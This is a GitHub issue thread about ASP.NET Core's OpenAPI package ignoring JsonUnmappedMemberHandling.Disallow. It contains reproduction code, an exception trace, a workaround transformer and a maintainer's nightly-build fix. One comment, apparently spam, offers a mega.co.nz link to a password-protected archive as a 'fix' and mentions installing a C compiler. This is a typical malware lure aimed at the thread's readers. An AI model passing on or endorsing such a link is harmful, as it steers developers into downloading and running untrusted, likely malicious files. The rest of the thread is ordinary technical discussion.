### ISSUE TITLE
UnmappedMemberHandling not working with Microsoft.AspNetCore.OpenApi

### ISSUE THREAD

**Issue by JTeeuwissen** [dotnet/aspnetcore#57981]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Describe the bug

In response to: https://github.com/dotnet/aspnetcore/issues/56318#issuecomment-2361615120

`JsonUnmappedMemberHandling.Disallow` does not seem to work.

If I enable it for this object

```cs
class ExampleObject
{
	public int ExampleProperty { get; init; }
}
```

I get

```json
"ExampleObject": {
    "type": "object",
    "properties": {
        "exampleProperty": {
            "type": "integer",
            "format": "int32"
        }
    }
}
```

or an exception, depending on the way of configuration.

### Expected Behavior

I expect to see

```json
"ExampleObject": {
    "type": "object",
    "additionalProperties": false,
    "properties": {
        "exampleProperty": {
            "type": "integer",
            "format": "int32"
        }
    }
}
```

### Steps To Reproduce

```cs
using System.Text.Json.Serialization;

var builder = WebApplication.CreateBuilder(args);

builder.Services.AddOpenApi();

// This seems to do nothing
builder.Services.ConfigureHttpJsonOptions(options =>
	options.SerializerOptions.UnmappedMemberHandling = JsonUnmappedMemberHandling.Disallow);

var app = builder.Build();

app.MapGet("/hello", () => new ExampleObject
{
	ExampleProperty = 123
});

app.MapOpenApi();

app.Run();

// This attributes causes an error
[JsonUnmappedMemberHandling(JsonUnmappedMemberHandling.Disallow)]
class ExampleObject
{
	public int ExampleProperty { get; init; }
}
```

### Exceptions (if any)

```
System.Text.Json.JsonException: 'Expected StartObject token to represent beginning of schema.'
   at OpenApiJsonSchema.JsonConverter.Read(Utf8JsonReader& reader, Type typeToConvert, JsonSerializerOptions options) in -\OpenApiJsonSchema.cs:line 21
```
presumably because additional properties is expected to be an object, and not `False`.

### .NET Version

9.0.100-rc.1.24452.12

### Anything else?

Something like the transformer below provides the expected behavior for my test cases

```cs
internal class DisableAdditionalPropertiesTransformer : IOpenApiSchemaTransformer
{
	public Task TransformAsync(OpenApiSchema schema, OpenApiSchemaTransformerContext context, CancellationToken cancellationToken)
	{
		if (schema is { Type: "object", AdditionalProperties: null } &&
		    context.JsonTypeInfo.Kind is not JsonTypeInfoKind.Dictionary &&
		    !context.JsonTypeInfo.Properties.Any(property => property.IsExtensionData))
		{
			schema.AdditionalPropertiesAllowed = false;
		}

		return Task.CompletedTask;
	}
}
```

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme

you may need to install the c compiler

**Comment by captainsafia** [comment]
@JTeeuwissen Thanks for filing this issue!

I've included a bug fix for this in a PR I'm working to address other feedback in the area. The fix for this should ship in .NET 9.

Once the PR is merged, you should be able to access preview builds of the package to access this fix. I can share instructions on how to do that once it ships if you're interested in using the preview bits.

**Comment by captainsafia** [comment]
@JTeeuwissen  The fix for this has landed in nightly package version `9.0.0-rtm.24476.2`.

You'll need to use the following `PackageReference`:

```
<PackageReference Include="Microsoft.AspNetCore.OpenApi" Version="9.0.0-rtm.24476.2" />
```

And make sure that you have a reference to the nightly dotnet9 feed in your `nuget.config` file:

```
<add key="dotnet9" value="https://pkgs.dev.azure.com/dnceng/public/_packaging/dotnet9/nuget/v3/index.json" />
```

Are you able to verify the fix on your end?

**Comment by JTeeuwissen** [comment]
> @JTeeuwissen The fix for this has landed in nightly package version `9.0.0-rtm.24476.2`.
> 
> You'll need to use the following `PackageReference`:
> 
> ```
> <PackageReference Include="Microsoft.AspNetCore.OpenApi" Version="9.0.0-rtm.24476.2" />
> ```
> 
> And make sure that you have a reference to the nightly dotnet9 feed in your `nuget.config` file:
> 
> ```
> <add key="dotnet9" value="https://pkgs.dev.azure.com/dnceng/public/_packaging/dotnet9/nuget/v3/index.json" />
> ```
> 
> Are you able to verify the fix on your end?

```cs
[JsonUnmappedMemberHandling(JsonUnmappedMemberHandling.Disallow)]
```
seems to work but
```cs
builder.Services.ConfigureHttpJsonOptions(options =>
	options.SerializerOptions.UnmappedMemberHandling = JsonUnmappedMemberHandling.Disallow);
```
still seemingly does nothing.
